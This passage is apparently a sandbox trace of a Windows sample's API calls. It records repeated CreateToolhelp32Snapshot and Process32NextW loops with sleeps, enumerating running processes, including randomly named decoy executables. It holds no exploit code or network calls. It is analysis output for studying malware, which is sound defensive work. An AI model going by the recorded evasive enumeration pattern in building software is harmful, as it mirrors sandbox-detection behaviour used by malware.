out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x940, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0119.714] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x960, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0119.715] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xacc, pcPriClassBase=8, dwFlags=0x0, szExeFile="XEY8d7zI.exe")) returned 1 [0119.717] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xba4, pcPriClassBase=8, dwFlags=0x0, szExeFile="LSfkRHur.exe")) returned 1 [0119.718] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xc0c, pcPriClassBase=8, dwFlags=0x0, szExeFile="Sypykbck.exe")) returned 1 [0119.720] CloseHandle (hObject=0xbc) returned 1 [0119.720] Sleep (dwMilliseconds=0x12c) [0120.055] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xc4 [0120.060] Process32FirstW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0120.060] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0120.061] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0120.062] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0120.062] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0120.063] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0120.064] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0120.065] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0120.065] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0120.066] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0120.066] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0120.067] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0120.068] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0120.068] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x330, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0120.069] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x30, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0120.070] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x39c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0120.070] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0120.071] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0120.072] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0120.073] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0120.074] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x540, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0120.075] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x358, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0120.076] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x598, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x330, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0120.078] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0120.079] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0120.080] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0120.081] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="fired-isolation-deny.exe")) returned 1 [0120.083] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="penguin weight doctrine.exe")) returned 1 [0120.085] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x49c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="requires bowling ireland.exe")) returned 1 [0120.086] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="xplivecam.exe")) returned 1 [0120.087] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="kissingaerospace.exe")) returned 1 [0120.089] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="slopefirewall.exe")) returned 1 [0120.090] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x118, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="motors.exe")) returned 1 [0120.097] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ins.exe")) returned 1 [0120.098] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x504, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="marble.exe")) returned 1 [0120.100] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="enlargement_zen_vb.exe")) returned 1 [0120.101] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x79c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="manuals_z.exe")) returned 1 [0120.103] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x810, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="infant coins forced.exe")) returned 1 [0120.104] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="attend.exe")) returned 1 [0120.106] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x830, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="concerned.exe")) returned 1 [0120.107] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="sandwichtelevisions.exe")) returned 1 [0120.109] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x850, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="pickup.exe")) returned 1 [0120.110] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="athletics-americans.exe")) returned 1 [0120.112] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x870, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="proudlydocumented.exe")) returned 1 [0120.113] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x880, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ajbehaviord.exe")) returned 1 [0120.115] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x940, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0120.116] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x960, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0120.118] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xacc, pcPriClassBase=8, dwFlags=0x0, szExeFile="XEY8d7zI.exe")) returned 1 [0120.119] CloseHandle (hObject=0xc4) returned 1 [0120.119] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xbc [0120.125] Process32FirstW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0120.126] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0120.126] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0120.127] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0120.128] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0120.128] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0120.176] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0120.177] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0120.178] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0120.179] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0120.180] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0120.181] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0120.181] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0120.182] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x330, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0120.183] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x30, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0120.184] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x39c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0120.185] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0120.185] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0120.186] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0120.188] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0120.189] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x540, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0120.191] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x358, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0120.192] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x598, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x330, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0120.194] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0120.195] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0120.196] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0120.198] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="fired-isolation-deny.exe")) returned 1 [0120.199] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="penguin weight doctrine.exe")) returned 1 [0120.201] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x49c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="requires bowling ireland.exe")) returned 1 